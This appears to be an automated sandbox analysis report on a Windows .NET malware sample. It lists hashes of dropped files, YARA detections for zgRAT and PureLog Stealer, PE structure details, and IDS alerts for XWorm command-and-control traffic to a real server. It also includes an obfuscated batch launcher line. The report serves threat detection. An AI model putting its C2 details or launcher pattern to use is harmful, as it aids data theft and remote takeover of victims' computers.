                                                                                            Size (bytes):613
                                                                                            Entropy (8bit):5.8756556186778734
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:gQBKqHhUw0yxU8eTTCioF1GQCSsw7Qk8/nPlBx/3/RCquwmdVV:nHGwlxU8eiioda5lf3Mqut
                                                                                            MD5:DBC9EF5E342602A887A6E2C0B8823B75
                                                                                            SHA1:42F7AF22FB21F2FCBB3E4990B0D332D82216BB8E
                                                                                            SHA-256:B15A1F8EB70C8645873E67BFA43434CF6B7A6AB70BDDFFD13678BE9FD130967D
                                                                                            SHA-512:9F8E2FEB45124E145350A93F735396EBE281C40461CECDC33772796B59997FFE540FC64286080FB1E989BF42DB6502E7172A5D3EE6A91002B9303DC4656624AF
                                                                                            Malicious:false
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\agentwebreviewDhcp\WmiPrvSE.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\agentwebreviewDhcp\WmiPrvSE.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Process:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):100
                                                                                            Entropy (8bit):5.153919005177815
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:a1Aj31g9qF+mP3LEJGoLgBZWFiAzGUO3:a1Ajqq/PAXcmzGx3
                                                                                            MD5:DBF2C6D812BEF8A05E965EE3959CF06F
                                                                                            SHA1:F0A022CCB62A657EF4569B4C06E38D72AC63004C
                                                                                            SHA-256:AA392A9FDDA6521EB12BDBC2E78F61190C4C28CC9BA7FA1F1857D5197D24BBAB
                                                                                            SHA-512:A5F7FD96AE62D6632B098C2A68D1528A23B3C3D6B1374124A3766C3B6470B94684A5BFB4034752DC18CAD64FF49EF4BB1D488B29E4FC1EFB997620E98FAEB720
                                                                                            Malicious:false
                                                                                            Preview:%LiqnMAhGsvM%%LhRQtxuRQYo%..%jSGTvqCvfAihqUT%"C:\agentwebreviewDhcp/portBrowserweb.exe"%VcswqNSLrPY%
                                                                                            Process:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Process:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):216
                                                                                            Entropy (8bit):5.775879505078954
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GVwqK+NkLzWbHnrFnBaORbM5nCa32gWfPEIJqvgFYWs:G4MCzWLnhBaORbQCMgEj0u
                                                                                            MD5:2F093CD779A9164BA67AFC2EC042C087
                                                                                            SHA1:B8E1F4E14C2D51F0D6B8EEA66EBE3AA16736E278
                                                                                            SHA-256:60A9CE888E47061C3F2479A53AD466DCACBD1B8B52DA1FB365D49E2A1319E0F1
                                                                                            SHA-512:D4321E29043FDDC0FEE19CD3A0E59A3F4DBF53477129FFF4FA180DD90731EDE6EDC851ECA8E09190C2A2C31B326C31D45FA4C3B6CB4F154146D7B73A1A552F01
                                                                                            Malicious:false
                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):5.978638570641455
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:HaLCYOFjMN.exe
                                                                                            File size:75'264 bytes
                                                                                            MD5:3c30d3b3706b97a2a0638180bb159b44
                                                                                            SHA1:eeb4a51ebfac2ba3a159f2b9ee1a4b1caef3b960
                                                                                            SHA256:7464ba97e34f2e95995d4a7a77e39409e57101d7ee156abf42f0b08deb192aa7
                                                                                            SHA512:9784d33f85f88e275571904284661085290a7a31344454b7f80d4aca9cb76a7cb8acabe4f21ee6917c51553b22393eb268dc02448dfda013f362c42fb74d1dda
                                                                                            SSDEEP:1536:D1He2dkYfPIVozC+ObXw3GFF64iOf+Iilu8wwP:FpTYbXBFCOf+Iiludi
                                                                                            TLSH:20737C2877E14525E5FFAFF51AF13212CB39E3639903D20F28CA028A1B17A88CD517E5
                                                                                            Icon Hash:00928e8e8686b000
                                                                                            Entrypoint:0x413a6e
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6779A13E [Sat Jan 4 20:59:42 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            Name | Virtual Address | Virtual Size | Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13a14 | 0x57 | .text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x4ce | .rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x16000 | 0xc | .reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                            .text | 0x2000 | 0x11a74 | 0x11c00 | 0215dccb02ff1b9ce49a0fd4f29aa8b3 | False | 0.5957306338028169 | data | 6.05122540072875 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc | 0x14000 | 0x4ce | 0x600 | 15075c229f5bff770511731196b85f0b | False | 0.3736979166666667 | data | 3.715870269791872 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc | 0x16000 | 0xc | 0x200 | baa7b2f29b759635ad3510e883d642f7 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                            RT_VERSION | 0x140a0 | 0x244 | data | | | 0.4706896551724138
                                                                                            RT_MANIFEST | 0x142e4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                                                            DLL | Import
                                                                                            mscoree.dll | _CorExeMain
                                                                                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                            2025-01-07T18:03:14.080824+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.7 | 49975 | 149.154.167.220 | 443 | TCP
                                                                                            2025-01-07T18:03:14.080824+0100 | 2853685 | ETPRO MALWARE Win32/XWorm Checkin via Telegram | 1 | 192.168.2.7 | 49975 | 149.154.167.220 | 443 | TCP
                                                                                            2025-01-07T18:03:28.966983+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:03:29.197267+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:03:29.198973+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:03:39.472382+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:03:39.475195+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:03:49.797368+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:03:49.809201+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:03:53.951272+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:03:53.951272+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:04:00.128847+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:04:00.247862+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:10.590947+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:04:10.923064+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:11.832339+0100 | 2853192 | ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound | 1 | 192.168.2.7 | 49976 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.065408+0100 | 2853191 | ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound | 1 | 94.141.122.161 | 7000 | 192.168.2.7 | 49976 | TCP
                                                                                            2025-01-07T18:04:12.465955+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.465955+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.587831+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.587831+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.706921+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.706921+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.819339+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.819339+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.926773+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:12.926773+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.037013+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.037013+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.174928+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.174928+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.324048+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.324048+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.460752+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.460752+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.610868+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.610868+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.740083+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.740083+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.870139+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:13.870139+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.036384+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.036384+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.175784+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.175784+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.329460+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.329460+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.448891+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.448891+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.589062+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.589062+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.772321+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:14.772321+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.014670+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.014670+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.210930+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.210930+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.372806+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.372806+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.506425+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.506425+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.699869+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.699869+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.871119+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:15.871119+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.025845+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.025845+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.165432+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.165432+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.303826+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.303826+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.451509+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.451509+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.627559+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.627559+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.745605+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.745605+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.863511+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.863511+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49982 | 94.141.122.161 | 7000 | TCP
                                                                                            2025-01-07T18:04:16.980517+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.980517+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.118048+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.118048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.220216+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.220216+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.336988+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.336988+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.453708+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.453708+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.563782+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.563782+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:17.672514+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
